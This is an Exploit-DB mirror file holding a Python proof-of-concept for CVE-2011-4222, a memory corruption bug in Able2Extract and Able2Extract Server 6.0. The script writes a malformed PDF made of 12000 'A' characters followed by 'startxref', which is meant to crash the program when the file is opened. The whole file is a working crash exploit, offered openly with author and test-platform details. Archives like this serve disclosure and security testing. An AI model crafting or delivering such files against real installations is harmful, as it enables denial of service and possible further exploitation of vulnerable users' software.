exploit-db-mirror/platforms/windows/dos/19392.py
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

18 lines
409 B
Python
Executable file

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()